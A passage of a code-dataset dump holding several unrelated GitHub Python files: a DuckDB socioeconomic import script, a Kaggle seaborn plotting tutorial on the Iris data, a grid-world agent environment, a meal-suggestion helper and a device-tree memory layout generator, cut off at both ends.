\"cpf\" in df_socioeconomic.columns:\n columns_to_test_for_dups = columns_to_test_for_dups + ['cpf']\n \n df_socioeconomic = df_socioeconomic.drop_duplicates(subset=columns_to_test_for_dups)\n \n return df_socioeconomic\n\n\n@log(log_file=\"logs/import_ufba_bronze_socioeco.log\")\ndef import_socioeconomic_to_ufba_bronze(\n duckdb_path: Path,\n socioeconomic_path: Path\n) -> None:\n # looping over socieconomic files \n for socioeconomic_file in socioeconomic_path:\n # getting table names\n table_name = socioeconomic_file.split(\"/\")[-1].split(\".\")[0].lower()\n \n # read the file\n df = read_socioeconomic(file_path=socioeconomic_file)\n df = pre_clean_socioeconomic_df(df_socioeconomic=df)\n insert_pandas_df_into_duckdb(\n df=df,\n duckdb_path=duckdb_path,\n schema=\"ufba_bronze\",\n table=table_name\n )\n \n\nif __name__ == \"__main__\":\n import_socioeconomic_to_ufba_bronze(\n duckdb_path=DuckDBFile.DUCKDB,\n socioeconomic_path=RawFiles.SOCIOECONOMIC\n )\n\n","repo_name":"silasge/lakehouse-ufba","sub_path":"lakehouse_ufba/ufba_bronze/socioeconomic/import_socioeconomic_files.py","file_name":"import_socioeconomic_files.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10146517185","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# I have created this Kernel for beginners who want to learn how to plot graphs with seaborn.This kernel is still a work in progress.I will be updating it further when I find some time.If you find my work useful please fo vote by clicking at the top of the page.Thanks for viewing\n\n# In[ ]:\n\n\n# This Python 3 environment comes with many helpful analytics libraries 
installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# **Importing pandas and Seaborn module**\n\n# In[ ]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight') \nimport warnings\nwarnings.filterwarnings('ignore') #this will ignore the warnings.it wont display warnings in notebook\n\n# **Importing Iris data set**\n\n# In[ ]:\n\n\niris=pd.read_csv('../input/Iris.csv')\n\n# **Displaying data **\n\n# In[ ]:\n\n\niris.head()\n\n# In[ ]:\n\n\niris.drop('Id',axis=1,inplace=True)\n\n# **Checking if there are any missing values **\n\n# In[ ]:\n\n\niris.info()\n\n# In[ ]:\n\n\niris['Species'].value_counts()\n\n# This data set has three varities of Iris plant.\n\n# **1. Describing the data**\n\n# In[ ]:\n\n\niris.describe().plot(kind = \"area\",fontsize=27, figsize = (20,8), table = True,colormap=\"rainbow\")\nplt.xlabel('Statistics',)\nplt.ylabel('Value')\nplt.title(\"General Statistics of Iris Dataset\")\n\n# Above plot gives us a General Idea about the dataset.\n\n# **2.Bar Plot :**\n# Here the frequency of the observation is plotted.In this case we are plotting the frequency of the three species in the Iris Dataset\n\n# In[ ]:\n\n\n#f,ax=plt.subplots(1,2,figsize=(18,8))\nsns.countplot('Species',data=iris)\n#ax.set_title('Iris Species Count')\nplt.show()\n\n# **3. Pie Chart :**\n# \n\n# In[ ]:\n\n\n#f,ax=plt.subplots(1,2,figsize=(18,8))\niris['Species'].value_counts().plot.pie(explode=[0.1,0.1,0.1],autopct='%1.1f%%',shadow=True,figsize=(10,8))\n#iris['Species'].value_counts().plot.pie(explode=[0.1,0.1,0.1],autopct='%1.1f%%',ax=ax[0],shadow=True)\n#ax[0].set_title('Iris Species Count')\n#ax[0].set_ylabel('Count')\n#sns.countplot('Species',data=iris,ax=ax[1])\n#ax[1].set_title('Iris Species Count')\nplt.show()\n\n\n# We can see that there are 50 samples each of all the Iris Species in the data set.\n\n# **4. Joint plot: **\n# Jointplot is seaborn library specific and can be used to quickly visualize and analyze the relationship between two variables and describe their individual distributions on the same plot.\n\n# In[ ]:\n\n\nfig=sns.jointplot(x='SepalLengthCm',y='SepalWidthCm',data=iris)\n\n# In[ ]:\n\n\nsns.jointplot(\"SepalLengthCm\", \"SepalWidthCm\", data=iris, kind=\"reg\")\n\n# In[ ]:\n\n\nfig=sns.jointplot(x='SepalLengthCm',y='SepalWidthCm',kind='hex',data=iris)\n\n# In[ ]:\n\n\nsns.jointplot(\"SepalLengthCm\", \"SepalWidthCm\", data=iris, kind=\"kde\",space=0,color='g')\n\n# In[ ]:\n\n\ng = (sns.jointplot(\"SepalLengthCm\", \"SepalWidthCm\",data=iris, color=\"k\").plot_joint(sns.kdeplot, zorder=0, n_levels=6))\n\n# **5. FacetGrid Plot**\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nsns.FacetGrid(iris,hue='Species',size=5)\\\n.map(plt.scatter,'SepalLengthCm','SepalWidthCm')\\\n.add_legend()\n\n# **6. 
Boxplot or Whisker plot**\n# Box plot was was first introduced in year 1969 by Mathematician John Tukey.Box plot give a statical summary of the features being plotted.Top line represent the max value,top edge of box is third Quartile, middle edge represents the median,bottom edge represents the first quartile value.The bottom most line respresent the minimum value of the feature.The height of the box is called as Interquartile range.The black dots on the plot represent the outlier values in the data.\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.boxplot(x='Species',y='PetalLengthCm',data=iris,order=['Iris-virginica','Iris-versicolor','Iris-setosa'],linewidth=2.5,orient='v',dodge=False)\n\n# In[ ]:\n\n\n#iris.drop(\"Id\", axis=1).boxplot(by=\"Species\", figsize=(12, 6))\niris.boxplot(by=\"Species\", figsize=(12, 6))\n\n# **7. Strip plot**\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.stripplot(x='Species',y='SepalLengthCm',data=iris,jitter=True,edgecolor='gray',size=8,palette='winter',orient='v')\n\n# **8. Combining Box and Strip Plots**\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.boxplot(x='Species',y='SepalLengthCm',data=iris)\nfig=sns.stripplot(x='Species',y='SepalLengthCm',data=iris,jitter=True,edgecolor='gray')\n\n# In[ ]:\n\n\nax= sns.boxplot(x=\"Species\", y=\"PetalLengthCm\", data=iris)\nax= sns.stripplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, jitter=True, edgecolor=\"gray\")\n\nboxtwo = ax.artists[2]\nboxtwo.set_facecolor('yellow')\nboxtwo.set_edgecolor('black')\nboxthree=ax.artists[1]\nboxthree.set_facecolor('red')\nboxthree.set_edgecolor('black')\nboxthree=ax.artists[0]\nboxthree.set_facecolor('green')\nboxthree.set_edgecolor('black')\n\nplt.show()\n\n# **9. Violin Plot**\n# It is used to visualize the distribution of data and its probability distribution.This chart is a combination of a Box Plot and a Density Plot that is rotated and placed on each side, to show the distribution shape of the data. The thick black bar in the centre represents the interquartile range, the thin black line extended from it represents the 95% confidence intervals, and the white dot is the median.Box Plots are limited in their display of the data, as their visual simplicity tends to hide significant details about how values in the data are distributed\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.violinplot(x='Species',y='SepalLengthCm',data=iris)\n\n# In[ ]:\n\n\nplt.figure(figsize=(15,10))\nplt.subplot(2,2,1)\nsns.violinplot(x='Species',y='PetalLengthCm',data=iris)\nplt.subplot(2,2,2)\nsns.violinplot(x='Species',y='PetalWidthCm',data=iris)\nplt.subplot(2,2,3)\nsns.violinplot(x='Species',y='SepalLengthCm',data=iris)\nplt.subplot(2,2,4)\nsns.violinplot(x='Species',y='SepalWidthCm',data=iris)\n\n# **10. Pair Plot:**\n# A “pairs plot” is also known as a scatterplot, in which one variable in the same data row is matched with another variable's value, like this: Pairs plots are just elaborations on this, showing all variables paired with all the other variables.\n\n# In[ ]:\n\n\nsns.pairplot(data=iris,kind='scatter')\n\n# In[ ]:\n\n\nsns.pairplot(iris,hue='Species')\n\n# **11. 
Heat map**\n# Heat map is used to find out the correlation between different features in the dataset.High positive or negative value shows that the features have high correlation.This helps us to select the parmeters for machine learning.\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.heatmap(iris.corr(),annot=True,cmap='cubehelix',linewidths=1,linecolor='k',square=True,mask=False, vmin=-1, vmax=1,cbar_kws={\"orientation\": \"vertical\"},cbar=True)\n\n# **12. Distribution plot:**\n# The distribution plot is suitable for comparing range and distribution for groups of numerical data. Data is plotted as value points along an axis. You can choose to display only the value points to see the distribution of values, a bounding box to see the range of values, or a combination of both as shown here.The distribution plot is not relevant for detailed analysis of the data as it deals with a summary of the data distribution.\n\n# In[ ]:\n\n\niris.hist(edgecolor='black', linewidth=1.2)\nfig=plt.gcf()\nfig.set_size_inches(12,6)\n\n# **13. Swarm plot**\n# It looks a bit like a friendly swarm of bees buzzing about their hive. More importantly, each data point is clearly visible and no data are obscured by overplotting.A beeswarm plot improves upon the random jittering approach to move data points the minimum distance away from one another to avoid overlays. The result is a plot where you can see each distinct data point, like shown in below plot\n# \n# \n# \n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig = sns.swarmplot(x=\"Species\", y=\"PetalLengthCm\", data=iris)\n\n# **14. Box and Swarm plot combined**\n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig= sns.boxplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, whis=np.inf)\nfig= sns.swarmplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, color=\".2\")\n\n# **15. Swarm and Violin plot combined**\n\n# In[ ]:\n\n\nsns.set(style=\"whitegrid\")\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nax = sns.violinplot(x=\"Species\", y=\"PetalLengthCm\", data=iris, inner=None)\nax = sns.swarmplot(x=\"Species\", y=\"PetalLengthCm\", data=iris,color=\"white\", edgecolor=\"black\")\n\n# **16. Species based classification**\n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nsc=iris[iris.Species=='Iris-setosa'].plot(kind='scatter',x='SepalLengthCm',y='SepalWidthCm',color='red',label='Setosa')\niris[iris.Species=='Iris-versicolor'].plot(kind='scatter',x='SepalLengthCm',y='SepalWidthCm',color='green',label='Versicolor',ax=sc)\niris[iris.Species=='Iris-virginica'].plot(kind='scatter',x='SepalLengthCm',y='SepalWidthCm',color='orange', label='virginica', ax=sc)\nsc.set_xlabel('Sepal Length in cm')\nsc.set_ylabel('Sepal Width in cm')\nsc.set_title('Sepal Length Vs Sepal Width')\nsc=plt.gcf()\nsc.set_size_inches(10,6)\n\n# **17. LM PLot**\n\n# In[ ]:\n\n\nfig=sns.lmplot(x=\"PetalLengthCm\", y=\"PetalWidthCm\",data=iris)\n\n# **18. FacetGrid**\n\n# In[ ]:\n\n\nsns.FacetGrid(iris, hue=\"Species\", size=6) \\\n .map(sns.kdeplot, \"PetalLengthCm\") \\\n .add_legend()\nplt.ioff() \n\n# **19. Andrews Curve:**\n# In data visualization, an Andrews plot or Andrews curve is a way to visualize structure in high-dimensional data. 
It is basically a rolled-down, non-integer version of the Kent–Kiviat radar m chart, or a smoothened version of a parallel coordinate plot.In Pandas use Andrews Curves to plot and visualize data structure.Each multivariate observation is transformed into a curve and represents the coefficients of a Fourier series.This useful for detecting outliers in times series data.Use colormap to change the color of the curves\n\n# In[ ]:\n\n\nfrom pandas.tools.plotting import andrews_curves\nandrews_curves(iris,\"Species\",colormap='rainbow')\nplt.show()\nplt.ioff()\n\n# **20. Parallel coordinate plot:**\n# This type of visualisation is used for plotting multivariate, numerical data. Parallel Coordinates Plots are ideal for comparing many variables together and seeing the relationships between them. For example, if you had to compare an array of products with the same attributes (comparing computer or cars specs across different models).\n\n# In[ ]:\n\n\nfrom pandas.tools.plotting import parallel_coordinates\nparallel_coordinates(iris, \"Species\")\n\n# **21. Radviz Plot**\n# RadViz Visualizer. RadViz is a multivariate data visualization algorithm that plots each feature dimension uniformly around the circumference of a circle then plots points on the interior of the circle such that the point normalizes its values on the axes from the center to each arc.\n\n# In[ ]:\n\n\nfrom pandas.tools.plotting import radviz\nradviz(iris, \"Species\")\n\n# ** 22. Factor Plot **\n\n# In[ ]:\n\n\n#f,ax=plt.subplots(1,2,figsize=(18,8))\nsns.factorplot('Species','SepalLengthCm',data=iris)\nplt.ioff()\nplt.show()\n#sns.factorplot('Species','SepalLengthCm',data=iris,ax=ax[0][0])\n#sns.factorplot('Species','SepalWidthCm',data=iris,ax=ax[0][1])\n#sns.factorplot('Species','PetalLengthCm',data=iris,ax=ax[1][0])\n#sns.factorplot('Species','PetalWidthCm',data=iris,ax=ax[1][1])\n\n# ** 23. Boxen Plot**|\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.boxenplot(x='Species',y='SepalLengthCm',data=iris)\n\n# **24.Residual Plot :**\n# The most useful way to plot the residuals, though, is with your predicted values on the x-axis, and your residuals on the y-axis. The distance from the line at 0 is how bad the prediction was for that value.\n\n# In[ ]:\n\n\nfig=plt.gcf()\nfig.set_size_inches(10,7)\nfig=sns.residplot('SepalLengthCm', 'SepalWidthCm',data=iris,lowess=True)\n\n# **25.Venn Diagram :**\n# A Venn diagram (also called primary diagram, set diagram or logic diagram) is a diagram that shows all possible logical relations between a finite collection of different sets. Each set is represented by a circle. The circle size represents the importance of the group. The groups are usually overlapping: the size of the overlap represents the intersection between both groups.\n\n# In[ ]:\n\n\n# venn2\nfrom matplotlib_venn import venn2\nsepal_length = iris.iloc[:,0]\nsepal_width = iris.iloc[:,1]\npetal_length = iris.iloc[:,2]\npetal_width = iris.iloc[:,3]\n# First way to call the 2 group Venn diagram\nvenn2(subsets = (len(sepal_length)-15, len(sepal_width)-15, 15), set_labels = ('sepal_length', 'sepal_width'))\nplt.show()\n\n# **26. 
Spider Graph **\n\n# In[ ]:\n\n\nfrom math import pi\ncategories = list(iris)[:4]\nN = len(categories)\nangles = [ n / float(N)*2*pi for n in range(N)]\nangles = angles + angles[:1]\nplt.figure(figsize = (10,10))\nax = plt.subplot(111,polar = True)\nax.set_theta_offset(pi/2)\nax.set_theta_direction(-1)\nplt.xticks(angles[:-1],categories)\nax.set_rlabel_position(0)\nplt.yticks([0,2,4,6],[\"0\",\"2\",\"4\",\"6\"],color= \"red\", size = 7)\nplt.ylim(0,6)\n\nvalues = iris.loc[0].drop(\"Species\").values.flatten().tolist()\nvalues = values + values[:1]\nax.plot(angles,values,linewidth = 1,linestyle=\"solid\",label =\"setosa\" )\nax.fill(angles,values,\"b\",alpha=0.1)\n\nvalues = iris.loc[1].drop(\"Species\").values.flatten().tolist()\nvalues = values + values[:1]\nax.plot(angles,values,linewidth = 1,linestyle=\"solid\",label =\"versicolor\" )\nax.fill(angles,values,\"orange\",alpha=0.1)\nplt.legend(loc = \"upper left\",bbox_to_anchor = (0.1,0.1))\nplt.show()\n\n# In[ ]:\n\n\n\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample268.py","file_name":"sample268.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24738406087","text":"import numpy as np\nfrom enum import IntEnum\n\nfrom skimage.draw import line as raytrace\n\n\nclass GridStatus(IntEnum):\n EMPTY = 0\n OBSTACLE = 1\n TARGET = 2\n AGENT = 3\n BOTH = 4\n PREV_AGENT = 5\n\nclass ScanStatus(IntEnum):\n OUT_OF_BOUNDS = -2\n OBSTRUCTED = -1\n EMPTY = 0\n OBSTACLE = 1\n TARGET = 2\n AGENT = 3\n BOTH = 4\n\nclass Direction(IntEnum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n UP_LEFT = 4\n UP_RIGHT = 5\n DOWN_LEFT = 6\n DOWN_RIGHT = 7\n\nVec2Dir = {\n (-1,0): Direction.UP,\n (1,0): Direction.DOWN,\n (0,-1): Direction.LEFT,\n (0,1): Direction.RIGHT,\n (-1,-1): Direction.UP_LEFT,\n (-1,1): Direction.UP_RIGHT,\n (1,-1): Direction.DOWN_LEFT,\n (1,1): Direction.DOWN_RIGHT,\n}\n\nDir2Vec = {\n Direction.UP: np.array([-1,0]),\n Direction.DOWN: np.array([1,0]),\n Direction.LEFT: np.array([0,-1]),\n Direction.RIGHT: np.array([0,1]),\n Direction.UP_LEFT: np.array([-1,-1]),\n Direction.UP_RIGHT: np.array([-1,1]),\n Direction.DOWN_LEFT: np.array([1,-1]),\n Direction.DOWN_RIGHT: np.array([1,1]),\n}\n\n\nclass Grid(object):\n '''\n Grid that represents the environment.\n Core data structure is a 2D array.\n '''\n def __init__(self,grid_size) -> None:\n self._grid = np.zeros((grid_size),dtype=int)\n self.agent_pos = None\n self.target_pos = None\n\n def size(self) -> tuple:\n return self._grid.shape\n\n def get_cell(self,pos) -> GridStatus:\n return self._grid[pos]\n\n def agent_reached_target(self) -> None:\n return np.sum(np.abs(self.agent_pos - self.target_pos)) == 0\n\n def in_bounds(self,coord) -> bool:\n return coord[0] >= 0 and coord[0] < self._grid.shape[0] and coord[1] >= 0 and coord[1] < self._grid.shape[1]\n\n def not_obstacle(self,coord) -> bool:\n return self._grid[coord[0],coord[1]] != GridStatus.OBSTACLE\n\n def set_obstacle(self, ind_slices) -> None:\n '''\n Pass in a tuple of slice objects\n slice(start,stop,step)\n '''\n self._grid[ind_slices] = GridStatus.OBSTACLE\n\n def fill_random_grid(self, probability) -> None:\n sample = np.random.random_sample(self._grid.shape)\n obs = sample < probability\n self._grid[obs==True] = GridStatus.OBSTACLE\n self._grid[obs==False] = GridStatus.EMPTY\n # self.place_target(self.target_pos, force=True)\n # self.place_agent(self.agent_pos, force=True)\n\n def 
set_random_target(self) -> None:\n self.target_pos = np.zeros((2), dtype=int)\n self.target_pos[0] = np.random.randint(0,self._grid.shape[0])\n self.target_pos[1] = np.random.randint(0,self._grid.shape[1])\n self.place_target(self.target_pos, force=True)\n\n def set_random_agent(self) -> None:\n self.agent_pos = np.zeros((2), dtype=int)\n self.agent_pos[0] = np.random.randint(0,self._grid.shape[0])\n self.agent_pos[1] = np.random.randint(0,self._grid.shape[1])\n self.place_agent(self.agent_pos, force=True)\n\n def place_agent(self,pos,force=False) -> bool:\n # force allows us to override obstacles\n row = pos[0]\n col = pos[1]\n if self.in_bounds((row,col)) and (force or self.not_obstacle((row,col))):\n if self.agent_pos is not None:\n self._grid[self.agent_pos[0], self.agent_pos[1]] = GridStatus.PREV_AGENT\n if self._grid[row,col] == GridStatus.TARGET:\n self._grid[row,col] = GridStatus.BOTH\n else:\n self._grid[row,col] = GridStatus.AGENT\n self.agent_pos = np.array([row,col])\n return True\n else:\n return False\n\n def place_target(self,pos,force=False) -> None:\n row = pos[0]\n col = pos[1]\n if self.in_bounds((row,col)) and (force or self.not_obstacle((row,col))):\n if self.target_pos is not None:\n self._grid[self.target_pos[0], self.target_pos[1]] = GridStatus.EMPTY\n if self._grid[row,col] == GridStatus.AGENT:\n self._grid[row,col] = GridStatus.BOTH\n else:\n self._grid[row,col] = GridStatus.TARGET\n self.target_pos = np.array([row,col])\n return True\n else:\n return False\n\n def agent_move(self,dir) -> bool:\n coord = self.agent_pos + np.array(Dir2Vec[dir])\n if self.in_bounds(coord) and self.not_obstacle(coord):\n return self.place_agent(coord)\n else:\n return False\n\n def scan_cells(self,area) -> list:\n '''\n Takes in a list of coordinate offsets, centered around the agent.\n Return the status of each coordinate.\n The status can be EMPTY or OBSTACLE or TARGET or BOTH\n '''\n result = []\n for offset in area:\n coord = self.agent_pos + np.array(offset)\n if not self.in_bounds(coord) or self._grid[coord[0],coord[1]] == GridStatus.OBSTACLE:\n result.append((offset, ScanStatus.OBSTACLE))\n elif self._grid[coord[0],coord[1]] == GridStatus.EMPTY or self._grid[coord[0],coord[1]] == GridStatus.PREV_AGENT:\n result.append((offset, ScanStatus.EMPTY))\n elif self._grid[coord[0],coord[1]] == GridStatus.AGENT:\n result.append((offset, ScanStatus.AGENT))\n elif self._grid[coord[0],coord[1]] == GridStatus.TARGET:\n result.append((offset, ScanStatus.TARGET))\n elif self._grid[coord[0],coord[1]] == GridStatus.BOTH:\n result.append((offset, ScanStatus.BOTH))\n return result\n\n def scan_cone(self,cone_ends) -> list:\n '''\n Takes in a list of coordinates, representing the endpoints of a cone centered around the agent.\n Return the status of each coordinate.\n The status can be EMPTY or OBSTACLE or AGENT or TARGET or BOTH.\n \n This works by performing ray tracing, starting from the agent pos, ending at each endpoint.\n The ray will stop at the first cell is that is TARGET or OBSTACLE.\n All cells before this cell will be EMPTY.\n Return nothing for cells after the obstacle since agent can not see it.\n '''\n result = {}\n for end_offset in cone_ends:\n endpoints = self.agent_pos + np.array(end_offset)\n ray_cc, ray_rr = raytrace(self.agent_pos[0], self.agent_pos[1], endpoints[0], endpoints[1])\n for c, r in zip(ray_cc, ray_rr):\n coord = (c,r)\n offset = (c - self.agent_pos[0], r - self.agent_pos[1])\n if not self.in_bounds(coord) or self._grid[coord[0],coord[1]] == GridStatus.OBSTACLE:\n 
result[coord] = (offset, ScanStatus.OBSTACLE)\n break\n elif self._grid[coord[0],coord[1]] == GridStatus.TARGET:\n result[coord] = (offset, ScanStatus.TARGET)\n break\n elif self._grid[coord[0],coord[1]] == GridStatus.BOTH:\n result[coord] = (offset, ScanStatus.BOTH)\n break\n elif not (coord in result):\n if self._grid[coord[0],coord[1]] == GridStatus.EMPTY or self._grid[coord[0],coord[1]] == GridStatus.PREV_AGENT:\n result[coord] = (offset, ScanStatus.EMPTY)\n elif self._grid[coord[0],coord[1]] == GridStatus.AGENT:\n result[coord] = (offset, ScanStatus.AGENT)\n \n result_list = [val for val in result.values()]\n return result_list\n\n def relative_target_pos(self) -> None:\n '''\n Returns the position of the target relative to the agent.\n '''\n return self.target_pos - self.agent_pos\n\n def translate_path_to_world_frame(self, path) -> np.ndarray:\n return path + self.agent_pos\n\n def print_grid(self) -> None:\n for i in range(self._grid.shape[0]):\n print(self._grid[i])\n\n\nif __name__ == \"__main__\":\n G = Grid((10,10))\n print(\"Initialization\")\n G.print_grid()\n G.place_agent((3,3))\n G.place_target((2,2))\n print(\"After placement\")\n G.print_grid()\n G.agent_move(Direction.UP)\n print(\"After agent move\")\n G.print_grid()\n","repo_name":"ben441318936/PlanningAndControl","sub_path":"GridWorld/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":8248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74534571046","text":"import random\nimport views\n\n\ndef choose_dinner(selectmeal, selections):\n meal_list = []\n no_recipe = str('No recipes for this selection available. Contribute!')\n try:\n if selections == \"comfortfood\":\n mealtime_filter = views.models.FoodMood.query.filter_by(meal=selectmeal, comfortfood=True).all()\n for dish in mealtime_filter:\n name = dish.name\n meal_list.append(name)\n elif selections == \"fish\":\n mealtime_filter = views.models.FoodMood.query.filter_by(meal=selectmeal, fish=True).all()\n for dish in mealtime_filter:\n name = dish.name\n meal_list.append(name)\n else:\n mealtime_filter = views.models.FoodMood.query.filter_by(meal=selectmeal).all()\n for dish in mealtime_filter:\n name = dish.name\n meal_list.append(name)\n suggestion = random.choice(meal_list)\n return suggestion\n except IndexError:\n return no_recipe\n\n\ndef select_url(suggestion):\n meal = views.models.FoodMood.query.filter_by(name=suggestion).first()\n try:\n url = meal.recipe\n return url\n except AttributeError:\n pass\n\n\n# convert url in correct form\ndef url_convert(recipe):\n if recipe.startswith(\"http://\") or recipe.startswith(\"https://\"):\n return recipe\n else:\n recipe_upd = \"http://\" + recipe\n return recipe_upd\n\n\n","repo_name":"vaidadry/playground-web","sub_path":"foodmood.py","file_name":"foodmood.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29399425582","text":"#!/usr/bin/env python3\nimport math\n\nprog_slots = 16\nprog_size = 4 * 1024 * 1024\n\ndata_slots = 12\ndata_size = 1024 * 1024 * 1024\n\nhigh_counter = 0x10\nlow_counter = 0x0\n\nddr_size = 16 * 1024 * 1024 * 1024\nddr0_high = 0x10\nddr0_low = 0x0\n\nbar_size = 32 * 1024 * 1024\nbar_high = 0x0\nbar_low = 0x10000000\n\nshared_size = 1024 * 1024 * 1024 * 2\ncma_size = 1024 * 1024 * 1024\n\ndts = \"/ {\\n\"\ndts += \" memory {\\n\"\ndts += \" device_type = \\\"memory\\\";\\n\"\ndts += f\" reg = <0x0 0x0 0x0 
0x7ff00000>, <{hex(ddr0_high)} {hex(ddr0_low)} {hex(math.floor(ddr_size / 0x100000000))} {hex(ddr_size % 0x100000000)}>;\\n\"\ndts += \" };\\n\\n\"\n\ndts += \" reserved-memory {\\n\"\ndts += \" #address-cells = <2>;\\n\"\ndts += \" #size-cells = <2>;\\n\"\ndts += \" ranges;\\n\\n\"\n\ndts += f\" delilah_bar: delilah@0 {{\\n\"\ndts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\ndts += \" reusable;\\n\"\ndts += f\" reg = <{hex(bar_high)} {hex(bar_low)} 0x0 {hex(bar_size)}>;\\n\"\ndts += f\" label = \\\"delilah_bar\\\";\\n\"\ndts += \" };\\n\\n\"\n\nfor i in range(prog_slots):\n dts += f\" delilah_p{i}: delilah@p{i} {{\\n\"\n dts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\n dts += \" reusable;\\n\" # no-map for DMA, reusable for CMA\n dts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(prog_size)}>;\\n\"\n dts += f\" label = \\\"delilah_p{i}\\\";\\n\"\n dts += \" };\\n\\n\"\n\n low_counter += prog_size\n if low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\nfor i in range(data_slots):\n dts += f\" delilah_d{i}: delilah@d{i} {{\\n\"\n dts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\n dts += \" reusable;\\n\" # no-map for DMA, reusable for CMA\n dts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(data_size)}>;\\n\"\n dts += f\" label = \\\"delilah_d{i}\\\";\\n\"\n dts += \" };\\n\\n\"\n\n low_counter += data_size\n if low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\ndts += \" delilah_s0: delilah@s0 {\\n\"\ndts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\ndts += \" reusable;\\n\" # no-map for DMA, reusable for CMA\ndts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(shared_size)}>;\\n\"\ndts += f\" label = \\\"delilah_s0\\\";\\n\"\ndts += \" };\\n\\n\"\n\nlow_counter += shared_size\nif low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\ndts += \" cma0: cma@0 {\\n\"\ndts += \" compatible = \\\"shared-dma-pool\\\";\\n\"\ndts += \" reusable;\\n\"\ndts += f\" reg = <{hex(high_counter)} {hex(low_counter)} 0x0 {hex(cma_size)}>;\\n\"\ndts += \" linux,cma-default;\\n\"\ndts += \" };\\n\\n\"\n\nlow_counter += cma_size\nif low_counter >= 0x100000000:\n low_counter = low_counter - 0x100000000\n high_counter += 1\n\nddr_left_high = math.floor((ddr_size - (data_size * data_slots) - (prog_size * prog_slots) - cma_size - shared_size) / 0x100000000)\nddr_left_low = math.floor((ddr_size - (data_size * data_slots) - (prog_size * prog_slots) - cma_size - shared_size) % 0x100000000)\n\ndts += \" ddr_rest {\\n\"\ndts += f\" reg = <{hex(high_counter)} {hex(low_counter)} {hex(ddr_left_high)} {hex(ddr_left_low)}>;\\n\"\ndts += \" };\\n\\n\"\n\ndts += \" };\\n\\n\"\n\ndts += \" udma_bar {\\n\"\ndts += \" compatible = \\\"ikwzm,u-dma-buf\\\";\\n\"\ndts += \" device-name = \\\"delilah_bar0\\\";\\n\"\ndts += f\" size = <0x0 {hex(bar_size)}>;\\n\"\ndts += \" memory-region = <&delilah_bar>;\\n\"\ndts += \" dma-coherent;\\n\"\ndts += \" sync-mode = <3>;\\n\"\ndts += \" };\\n\\n\"\n\nfor i in range(prog_slots):\n dts += f\" udma_p{i} {{\\n\"\n dts += \" compatible = \\\"ikwzm,u-dma-buf\\\";\\n\"\n dts += f\" device-name = \\\"delilah_prog{i}\\\";\\n\"\n dts += f\" size = <0x0 {hex(prog_size)}>;\\n\"\n dts += f\" memory-region = <&delilah_p{i}>;\\n\"\n dts += \" sync-mode = <1>;\\n\"\n dts += \" dma-mask = <64>;\\n\"\n dts += \" };\\n\\n\"\n\nfor i in range(data_slots):\n dts += f\" udma_d{i} {{\\n\"\n dts += \" compatible = 
